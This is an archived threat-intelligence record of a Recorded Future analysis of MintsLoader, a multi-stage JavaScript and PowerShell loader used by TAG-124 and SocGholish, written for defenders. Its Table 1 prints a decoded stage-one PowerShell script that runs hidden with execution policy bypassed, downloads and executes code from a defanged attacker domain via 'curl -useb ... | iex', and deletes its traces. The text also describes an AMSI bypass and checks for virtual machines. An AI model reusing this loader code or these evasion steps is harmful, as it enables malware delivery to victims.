{
	"id": "b53e26f7-5564-4b42-96f1-0c755a285530",
	"created_at": "2026-04-29T08:21:41.082116Z",
	"updated_at": "2026-04-29T10:41:56.548905Z",
	"deleted_at": null,
	"sha1_hash": "7ef23fd4ec87acdbeba339a54da29e5648dc7948",
	"title": "MintsLoader Malware Analysis: Multi-Stage Loader Used by TAG-124 and SocGholish",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 11378321,
	"plain_text": "MintsLoader Malware Analysis: Multi-Stage Loader Used by\r\nTAG-124 and SocGholish\r\nBy Insikt Group®\r\nArchived: 2026-04-29 06:59:16 UTC\r\nExecutive Summary\r\nMintsLoader, a malicious loader, was first observed in multiple phishing and drive-by download campaigns as\r\nearly as 2024. The loader commonly deploys second-stage payloads such as GhostWeaver, StealC, and a modified\r\nBOINC (Berkeley Open Infrastructure for Network Computing) client. MintsLoader operates through a multi-stage infection chain involving obfuscated JavaScript and PowerShell scripts. The malware employs sandbox and\r\nvirtual machine evasion techniques, a domain generation algorithm (DGA), and HTTP-based command-and-control (C2) communications.\r\nMintsLoader has been observed being used by various threat groups; however, operators of TAG-124 (also known\r\nas LandUpdate808) have used it extensively. The loader is deployed through multiple infection vectors, including\r\nphishing emails targeting the industrial, legal, and energy sectors (TAG-124); compromised websites\r\nimpersonating browser update prompts (SocGholish); and invoice-themed lures distributed via Italy’s PEC\r\ncertified email system.\r\nMintsLoader’s use of obfuscation complicates static detections such as YARA rules, its use of DGA-based C2\r\ninfrastructure makes it difficult to maintain up-to-date watchlists or blocklists, and its anti-analysis techniques\r\ncomplicate host-based detections that rely on sandboxes or virtualization. But Recorded Future’s Malware\r\nIntelligence Hunting identifies new MintsLoader samples and associated C2 domains and provides an up-to-date\r\nlist for blocklists or threat hunting.\r\nMintsLoader’s persistent use of obfuscation, sandbox evasion, and adaptive infrastructure likely ensures its\r\ncontinued presence within the malware ecosystem, likely leading to increased use by additional threat actors. The\r\nmalware’s role as a versatile delivery mechanism reflects the increasing professionalization and specialization\r\nwithin the cybercriminal community. While this growing sophistication benefits threat actors by enabling more\r\nresilient and efficient operations, it may simultaneously provide opportunities for defenders to identify and disrupt\r\nmalicious activity more effectively and at scale.\r\nKey Findings\r\nMintsLoader's second-stage PowerShell script uses sandbox and virtual environment evasion techniques,\r\nreducing its susceptibility to automated analysis and increasing its likelihood of bypassing dynamic\r\nhttps://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting\r\nPage 1 of 18\n\ndetection tools.\r\nMintsLoader's use of a DGA to generate daily C2 domains based on the system date complicates\r\ninfrastructure monitoring activity and domain/IP-based detections.\r\nRecorded Future’s Malware Intelligence Hunting provides up-to-date C2 domains and other artifacts\r\nrelated to MintsLoader that would otherwise be hard to track due to its dynamic infrastructure.\r\nInsikt Group shows that GhostWeaver is the primary payload deployed by MintsLoader across observed\r\ncampaigns.\r\nGhostWeaver’s self-signed X.509 certificates are similar to those of AsyncRAT and variants of AsyncRAT,\r\nleading to initial false associations with other malware families such as AsyncRAT.\r\nBackground\r\nOrange Cyberdefense first detected MintsLoader in widespread distribution campaigns between July and October\r\n2024. Insikt Group identified earlier campaigns in February 2024, based on Palo Alto’s Unit42 analysis of a\r\nSocGholish infection.\r\nThe loader consists of JavaScript (stage one) and PowerShell (stage two) scripts retrieved from multiple DGA-based domains. The name “MintsLoader” is derived from its distinctive use of the URL parameter\r\ns=mints[NUMBER] (for example, s=mints11). MintsLoader is typically observed in campaigns delivering\r\nsecondary payloads such as GhostWeaver, StealC, and the Berkeley Open Infrastructure for Network Computing\r\n(BOINC) client.\r\nFigure 1: MintsLoader profile (Source: Recorded Future)\r\nWhile MintsLoader is believed to be used by multiple threat actors, TAG-124 (also known as LandUpdate808)\r\ninfections have frequently been observed deploying MintsLoader. Additionally, threat actors using SocGholish\r\nwere early adopters of MintsLoader, resulting in the initial assessment of MintsLoader campaigns as being\r\nhttps://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting\r\nPage 2 of 18\n\nexclusively associated with SocGholish. For example, in February 2024, Palo Alto’s Unit42 released indicators\r\nlinked to SocGholish (Figure 2); however, Insikt Group's analysis indicates that the URLs identified as delivering\r\nAsyncRAT also align with known MintsLoader URL patterns.\r\nFigure 2: Palo Alto SocGholish infection IoCs (Source: Recorded Future)\r\nSimilarly, in July 2024, Huntress Labs reported a SocGholish infection delivering a BOINC client. Notably, the\r\nURL used to download the BOINC matches known MintsLoader URL patterns. Figure 3 shows a high-level\r\noverview of the threat actors that use MintsLoader.\r\nFigure 3: Threat actors' use of MintsLoader (Source: Recorded Future)\r\nBelow are recently reported campaigns involving MintsLoader.\r\nMintsLoader and Kongtuke/ClickFix pages\r\nIn early 2025, security analysts observed a phishing campaign delivering MintsLoader as a first-stage loader.\r\nPhishing emails (targeting the energy, oil and gas, and legal sectors in the US and Europe) carried either a\r\nmalicious JavaScript attachment or a link to a fake “Click to verify” web page. Figure 4 shows examples of\r\nClickFix pages.\r\nhttps://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting\r\nPage 3 of 18\n\nIn both cases, the result was the execution of MintsLoader’s PowerShell-based second stage on the victim’s\r\nmachine. This loader pulled down the final payloads, notably the StealC infostealer and a modified BOINC client\r\nbuild. The campaign leveraged fake CAPTCHA verification pages (ClickFix/KongTuke lures) to trick users into\r\nexecuting a copied PowerShell command, which downloaded and ran MintsLoader (Figure 5).\r\nFigure 5: MintsLoader ClickFix infection chain (Source: Recorded Future)\r\nOther infection chains in this campaign delivered MintsLoader via a downloaded ‘Fattura########.js’ file (Italian\r\nfor “invoice”) that victims opened, leading to the same PowerShell loader execution. Researchers at eSentire’s\r\nhttps://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting\r\nPage 4 of 18\n\nThreat Response Unit reported this campaign and noted the threat actors’ focus on industrial and professional\r\nservices targets across North America and Europe.\r\nSocGholish “FakeUpdates” Campaigns\r\nMultiple reports indicate (1, 2) that the SocGholish (FakeUpdates) threat actors incorporated MintsLoader into\r\ntheir operations. Starting around July 2024, SocGholish infections from compromised websites showed infection\r\nchains installing the BOINC-distributed computing client via MintsLoader.\r\nIn this drive-by campaign, shown in Figure 6, victims browsing legitimate but compromised sites encountered\r\nfake browser update prompts (often originating from an update.js script). If run, the malicious JavaScript fetched\r\nan obfuscated MintsLoader payload, kicking off a multi-step PowerShell sequence.\r\nFigure 6: MintsLoader fake updates example (Source: TRAC Labs)\r\nHuntress Labs documented two parallel outcomes: one branch resulted in a fileless AsyncRAT running in memory,\r\nwhile the other led to a stealth BOINC installation under attacker control. The BOINC deployment was notably\r\nmodified and configured to connect to a malicious C2 rather than the standard BOINC server.\r\nIn some cases, the GhostWeaver PowerShell backdoor (tracked by Mandiant as UNC4108) was also delivered via\r\nMintsLoader, providing attackers with a persistent foothold and a platform to load additional plugins.\r\nInvoice Phishing in Europe\r\nAnother MintsLoader campaign in late 2024 targeted European organizations via invoice-themed phishing emails,\r\nan example of which is shown in Figure 7. Spam messages leveraged Italy’s PEC (certified email) system to add\r\nlegitimacy and lured recipients into opening attached JavaScript files masquerading as invoices. The Spamhaus\r\nresearch team dubbed this the “PEC invoice scam” and highlighted how the attackers abused trusted email\r\nchannels to bypass security checks. This campaign was noted for “stealing time, money, and trust from\r\nbusinesses.”\r\nhttps://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting\r\nPage 5 of 18\n\nFigure 7: PEC phishing email (Source: Spamhaus)\r\nTechnical Analysis\r\nMintsLoader uses a multi-stage execution chain involving JavaScript and PowerShell, with each stage employing\r\nobfuscation to hinder analysis. Although MintsLoader functions solely as a loader without supplementary\r\ncapabilities, its primary strengths lie in its sandbox and virtual machine evasion techniques and a DGA\r\nimplementation that derives the C2 domain based on the day it is run. These features significantly complicate\r\nstatic analysis and host-based detection. Despite this, its C2 communications occur over HTTP, which provides a\r\nreliable vector for detecting and identifying new samples. Figure 8 provides the high-level capabilities of\r\nMintsLoader.\r\nFigure 8: MintsLoader high-level capabilities (Source: Recorded Future)\r\nThis analysis of MintsLoader includes details on the first- and second-stage payloads and MintsLoader\r\ninfrastructure.\r\nhttps://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting\r\nPage 6 of 18\n\nMintsLoader Attack Chain\r\nMintsLoader is commonly delivered via phishing emails containing links to KongTuke or ClickFix pages. When\r\nexecuted, these pages retrieve and run the first stage of JavaScript. The JavaScript is heavily obfuscated, and\r\nexecution leads to running a PowerShell command to download and execute the second stage of MintsLoader, as\r\nshown in Figure 9.\r\nThis second stage conducts environment checks to determine whether it is running in a sandbox or virtualized\r\nsetting. Next, the script uses a DGA to produce the next C2 domain. MintsLoader then attempts to contact the\r\ngenerated domain to download the final payload, such as GhostWeaver, StealC, or the BOINC client. Figure 10\r\nshows a high-level overview of this attack chain.\r\nFigure 10: Common MintsLoader infection chain (Source: Recorded Future)\r\nStage One: JavaScript\r\nThe initial stage of MintsLoader consists of a JavaScript file that executes a PowerShell command to retrieve the\r\nsecond stage. The script is heavily obfuscated using junk comments, non-readable variables and function names,\r\nhttps://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting\r\nPage 7 of 18\n\ncharacter replacement, and string encoding (Figure 11). Insikt Group found 141 MintsLoader stage one samples\r\nusing data derived from Recorded Future Malware Intelligence Hunting (Appendix A).\r\nFigure 11: MintsLoader stage one obfuscated JavaScript (Source: Recorded Future)\r\nThe core function of the stage one JavaScript payload is to run a PowerShell command that executes the command\r\n‘curl -useb http://[domain]/1.php?s=[campaign]’, which downloads and executes the second stage. When ‘curl’ is\r\nused in PowerShell with the option ‘-useb’, it is an alias for Invoke-WebRequest, and the program cURL is not\r\nactually used to make the HTTP request.\r\nInsikt Group identified three distinct versions of the stage one loader, all of which employ the same JavaScript\r\nobfuscation techniques but differ in implementing the deployed PowerShell.\r\nThe first variant executes the PowerShell command in clear text, with the C2 domain hard-coded, as shown in\r\nFigure 12. This variant is seen in “mints13” and “flibabc11” campaigns.\r\nIn the second variation, the PowerShell command is obfuscated using character replacement. The C2 domain is\r\nstill hard-coded, and an alias for the curl command is used instead, but the object is still to download the next\r\nstage (Figure 13). This is the most widely used variant across the campaigns: “flibabc21”, “flibabc22”, ”mints11”,\r\n“mints13”, “mints21”, and “mints42”.\r\nhttps://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting\r\nPage 8 of 18\n\nThe third variation encodes the command in Base64 (Figure 14). Insikt Group has seen this method used with the\r\nolder campaign “mints13”.\r\nHowever, in this version, the PowerShell command creates a file containing the PowerShell command to\r\ndownload the second stage via cURL. It then runs the file and deletes it.\r\nhttps://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting\r\nPage 9 of 18\n\n$ErrorActionPreference = \"Continue\"\r\n$randomNamePart1 = -join ((48..57) + (97..122) | Get-Random -Count 5 | % { [char]$_ });\r\n$currentTimeHour = [int](Get-Date -Format HH);\r\n$currentTimeMinute = [int](Get-Date -Format mm);\r\n$minuteAdjustment = 3;\r\nIf ($currentTimeMinute + $minuteAdjustment -gt 59) {\r\n$currentTimeHour = $currentTimeHour + 1;\r\n$currentTimeMinute = $currentTimeMinute + $minuteAdjustment - 60;\r\n} Else {\r\n$currentTimeMinute = $currentTimeMinute + $minuteAdjustment;\r\n};\r\n$currentTimeHour = If (([int](Get-Date -Format HH) + 1) -gt 23) { \"00\" } Else { $currentTimeHour };\r\n$randomNamePart2 = -join ((65..90) + (97..122) | Get-Random -Count 12 | % { [char]$_ });\r\n$scriptToExecute = @\"\r\n$ErrorActionPreference = \"Continue\"\r\ncurl -useb \"http://gibuzuy37v2v\\[.]top/1.php?s=mints13\" | iex;\r\nRemove-Item \"C:\\Users\\Public\\Documents\\$($randomNamePart2).ps1\" -Force\r\n\"@;\r\n\"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c $($scriptToExecute)\" | Out-File\r\n-FilePath \"C:\\Users\\Public\\Documents\\$($randomNamePart2).ps1\";\r\npowershell -noprofile -executionpolicy bypass -WindowStyle hidden -File\r\n\"C:\\Users\\Public\\Documents\\$($randomNamePart2).ps1\";\r\nRemove-Item \"$env:APPDATA\\*.ps1\" -Force\r\nRemove-Item \"$env:APPDATA\\*.bat\" -Force\r\nTable 1: Decoded base64 text stage one PowerShell (Source: Recorded Future)\r\nStage One C2 Communication\r\nExecuting any variant results in an HTTP GET request to the hard-coded domain to retrieve the second-stage\r\npayload. A successful request will retrieve and execute the PowerShell script shown in Figure 15.\r\nhttps://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting\r\nPage 10 of 18\n\nFigure 15: Successful stage two retrieval from C2 (Source: Recorded Future)\r\nIf the DGA domain is no longer valid, a 302 response is returned, as shown in Figure 16.\r\nFigure 16: Failed stage two retrieval from C2 (Source: Recorded Future)\r\nStage Two PowerShell\r\nThe second stage, PowerShell, contains a Base64-encoded string. After XOR decoding and uncompressing, the\r\nprimary payload, which is also obfuscated, is yielded. Figure 17 shows a snippet of this payload, illustrating\r\nMintsLoader's obfuscated string construction techniques.\r\nhttps://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting\r\nPage 11 of 18\n\nFigure 17: Stage two PowerShell obfuscation (Source: Recorded Future)\r\nAfter the initial deobfuscation and decoding, the second stage of PowerShell starts by attempting to bypass\r\nAntimalware Scan Interface (AMSI) using a known technique to fake AMSI initialization failure: setting the\r\nvariable amsiInitFailed of the System.Management.Automation.AmsiUtils object to TRUE.\r\nThe rest of the code is responsible for executing three system information queries: the return values used in logical\r\nexpressions to detect whether the system is running on bare metal, sandbox, or virtual machine. This is conveyed\r\nto the C2 through an integer variable sent as the URL parameter key, and the C2 examines its value to determine if\r\nits response will return a third stage that downloads the final payload or a decoy. It should be noted that the\r\nconstant integer values used to increment the key variable change with each second-stage sample.\r\nThe result of each system information query is checked against three logical expressions, the order of which varies\r\nper sample, along with constants that increment the key, whose results affect the key variable value. The logical\r\nexpressions may not provide apparent results on initial inspection. For example, if the first deobfuscated system\r\ncheck, shown below in Figure 18, were to run on a virtual machine, the $isVirtualMachine variable would be\r\nequal to $true. The logical expression \"$true -eq 3\" evaluates to $true in PowerShell, increasing the key by\r\n15310805757 instead of 83670406277.\r\nhttps://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting\r\nPage 12 of 18\n\nFigure 18: Stage two PowerShell virtual machine check (Source: Recorded Future)\r\nThe second system check queries the AdapterDACType member of the Win32_VideoController WMI object to\r\nobtain the name or identifier of the digital-to-analog converter (DAC) chip, as shown in Figure 19. This\r\ndetermines whether the infected system is running on an emulator or virtually. Typically, a Windows system will\r\nreturn \"Internal\" and/or \"Integrated RAMDAC,\" which would increment the key by 14467965888 in this example.\r\nFigure 19: Stage two PowerShell video controller check (Source: Recorded Future)\r\nThe third system check queries the purpose member of the Win32_CacheMemory WMI object, which will equal\r\n\"L1 Cache\" on a typical Windows system. The non-obvious logical expression \"$l1CachePurpose.length —gt 4\"\r\nwill execute in the optimal case, incrementing the key value by 27424330481 in the deobfuscated example seen in\r\nFigure 20.\r\nhttps://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting\r\nPage 13 of 18\n\nFigure 20: Stage two PowerShell memory check (Source: Recorded Future)\r\nThe system checks and calculation of the key are followed by generating a random seed based on the date and a\r\nconstant, which is used with a system.Random object to construct the domain using a simple DGA and the URL\r\npath, as shown in Figure 21. The author may have made a mistake by not using the second random variable to\r\nconstruct the URL path. Instead, they use an undefined variable for the URL path ending, making the URL path\r\nending a constant \"htr.php\". Note that in PowerShell, curl is an alias for Invoke-WebRequest, which is used to\r\ngenerate the request to the C2 for the third stage, so the User-Agent HTTP header will include PowerShell version\r\ninformation, not curl.\r\nFigure 21: Stage two PowerShell final payload retrieval (Source: Recorded Future)\r\nStage Two C2 Communication\r\nFigure 22 shows an example of a MintsLoader request for the final payload, with a URL path ending in htr.php.\r\nThe URL parameter id is the hostname, and the URL parameter s is the campaign ID.\r\nFigure 22: Recent stage two C2 GET Request (Source: Recorded Future)\r\nhttps://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting\r\nPage 14 of 18\n\nAn example of an earlier MintsLoader request for the third stage is shown in Figure 23, with the URL path not\r\nrandomized but instead the constant string \"2.php\".\r\nFigure 23: Older stage two C2 GET Request (Source: Recorded Future)\r\nIf the second-stage request does not meet specific requirements, the final payload may lead to a decoy executable\r\n(Figure 24), as in this example, which leads to an AsyncRAT decoy executable downloaded from the site\r\ntemp[.]sh. This association with AsyncRAT led to initial naming in reports and some countermeasures for network\r\ntraffic as \"AsyncRAT Loader\", which causes MintsLoader malware samples to be incorrectly tagged as AsyncRAT\r\neven though current MintsLoader campaigns do not deploy AsyncRAT.\r\nA recent successful attempt is shown in Figure 25; in this example, the final payload is GhostWeaver.\r\nFigure 25: MintsLoader GhostWeaver payload (Source: Recorded Future)\r\nGhostWeaver\r\nOne of the most commonly observed payloads deployed by MintsLoader is GhostWeaver, a PowerShell-based\r\nremote access trojan (RAT) exhibiting code similarities and functional overlaps with MintsLoader. Notably,\r\nGhostWeaver can deploy MintsLoader as an additional payload via its sendPlugin command. Communication\r\nbetween GhostWeaver and its command-and-control (C2) server is secured through TLS encryption using an\r\nobfuscated, self-signed X.509 certificate embedded directly within the PowerShell script, which is leveraged for\r\nclient-side authentication to the C2 infrastructure.\r\nhttps://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting\r\nPage 15 of 18\n\nGhostWeaver has periodically been misclassified as AsyncRAT. Insikt Group assesses with moderate confidence\r\nthat this misclassification originated from Palo Alto Networks initially identifying a GhostWeaver sample\r\n(SHA256: fb0238b388d9448a6b36aca4e6a9e4fbcbac3afc239cb70251778d40351b5765) as a fileless AsyncRAT\r\nvariant. GhostWeaver and AsyncRAT share certain characteristics within their self-signed X.509 certificates, such\r\nas identical expiration dates and serial number lengths; however, these similarities may simply reflect common\r\ncertificate-generation methods rather than meaningful operational overlap.\r\nMintsLoader Infrastructure\r\nInsikt Group initially found MintsLoader C2 servers hosted solely on BLNWX but later observed its growing use\r\nof other ISPs such as Stark Industries Solutions Ltd (AS44477), GWY IT Pty Ltd. (AS199959), or SCALAXY-AS\r\n(58061), among others. MintsLoader C2 IP addresses announced via SCALAXY-AS are operated by hosting\r\nproviders 3NT Solutions LLP and IROKO Networks Corporation, both of which are a part of the Russian-language bulletproof hosting provider Inferno Solutions (inferno[.]name). The switch to SCALAXY-AS and Stark\r\nIndustries Solutions suggests that MintsLoader operators have shifted from relying on anonymous virtual private\r\nserver (VPS) providers to more traditional bulletproof hosters, likely in an effort to harden their infrastructure\r\nagainst takedown attempts and enhance operational stability.\r\nOver the past several months, Insikt Group has identified a range of suspected additional campaign IDs and\r\npayloads (Table 2). This data is compiled from open research and Insikt Group’s internal research.\r\nCampaign\r\nID\r\nObserved Final\r\nPayload\r\nLast Date\r\nActive\r\nNotes\r\n521 StealC 2025-04-20\r\n522 StealC 2025-04-20\r\n523 StealC 2025-04-20 observed in connection with AsyncRAT infections\r\n524 StealC 2025-04-20 N/A\r\n527 GhostWeaver 2025-04-20 Linked to TAG-124 by Insikt Group\r\nflibabc11 GhostWeaver 2025-04-20\r\nhttps://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting\r\nPage 16 of 18\n\nCampaign\r\nID\r\nObserved Final\r\nPayload\r\nLast Date\r\nActive\r\nNotes\r\nflibabc12 GhostWeaver 2025-04-20\r\nflibabc13 GhostWeaver 2025-04-20\r\nflibabc14 StealC 2025-04-20\r\nflibabc21 GhostWeaver 2025-04-20\r\nflibabc22 GhostWeaver 2025-04-20\r\nflibabc23 GhostWeaver 2025-04-20\r\nflibabc25 GhostWeaver 2025-04-20\r\n515 N/A N/A Observed in connection with AsyncRAT infections\r\n578 N/A N/A\r\nLinked to TAG-124 via the domain sesraw[.]com,\r\nwhich Insikt Group had previously linked to TAG-124\r\n579 N/A N/A Observed in connection with AsyncRAT infections\r\nboicn N/A N/A Observed in connection with AsyncRAT infections\r\nmints1 N/A N/A N/A\r\nmints11 N/A N/A N/A\r\nhttps://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting\r\nPage 17 of 18\n\nCampaign\r\nID\r\nObserved Final\r\nPayload\r\nLast Date\r\nActive\r\nNotes\r\nmints12 N/A N/A N/A\r\nmints13 N/A N/A N/A\r\nmints21 N/A N/A N/A\r\nTable 2: Suspected MintsLoader campaign IDs (Source: Recorded Future)\r\nTwo additional potential campaign IDs, js2 and dav, were observed in 2023, with js2 identified in an AsyncRAT\r\ninfection.\r\nTo read the entire analysis, click here to download the report as a PDF.\r\nSource: https://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting\r\nhttps://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting\r\nPage 18 of 18",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting"
	],
	"report_names": [
		"uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting"
	],
	"threat_actors": [
		{
			"id": "4390d8ec-605d-493a-81ee-d5ef80c07046",
			"created_at": "2025-05-29T02:00:03.223467Z",
			"updated_at": "2026-04-29T10:39:53.882509Z",
			"deleted_at": null,
			"main_name": "TAG-124",
			"aliases": [
				"LandUpdate808"
			],
			"source_name": "MISPGALAXY:TAG-124",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1777450901,
	"ts_updated_at": 1777459316,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7ef23fd4ec87acdbeba339a54da29e5648dc7948.pdf",
		"text": "https://archive.orkl.eu/7ef23fd4ec87acdbeba339a54da29e5648dc7948.txt",
		"img": "https://archive.orkl.eu/7ef23fd4ec87acdbeba339a54da29e5648dc7948.jpg"
	}
}